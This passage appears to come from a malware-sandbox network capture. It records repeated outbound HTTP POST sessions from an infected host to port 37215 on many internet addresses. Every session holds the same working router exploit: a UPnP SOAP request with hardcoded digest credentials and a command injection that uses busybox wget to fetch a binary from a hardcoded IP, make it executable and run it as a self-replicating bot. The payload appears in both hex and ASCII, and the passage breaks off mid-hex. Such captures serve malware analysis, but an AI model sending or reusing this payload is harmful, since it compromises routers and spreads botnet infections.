                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1581192.168.2.2344124157.3.76.8737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497219086 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1582192.168.2.235546483.89.92.23037215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497221947 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1583192.168.2.2356944157.219.245.22137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497237921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1584192.168.2.2350084197.199.61.1137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497260094 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1585192.168.2.235723036.109.0.20137215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497262001 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1586192.168.2.234830241.236.156.4437215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497364044 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1587192.168.2.2336870201.31.169.10737215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497371912 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1588192.168.2.235789841.89.78.10237215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497412920 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1589192.168.2.2348984157.33.127.1537215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497422934 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 91.92.249.80 -l /tmp/.wei -r /mips.nn; /bin/busybox chmod 777 /tmp/.wei; /tmp/.wei selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                          Session IDSource IPSource PortDestination IPDestination Port
                                          1590192.168.2.2360072137.79.34.9637215
                                          TimestampBytes transferredDirectionData
                                          May 28, 2024 14:47:00.497448921 CEST827OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                          Connection: keep-alive
                                          Accept: */*
                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                          Content-Length: 458
                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 39 31 2e 39 32 2e 32 34 39 2e 38 30 20 2d 6c 20 2f 74 6d 70 2f 2e 77 65 69 20 2d 72 20 2f 6d 69 70 73 2e 6e 6e 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 77 65 69 3b 20 2f 74 6d 70 2f [TRUNCATED]
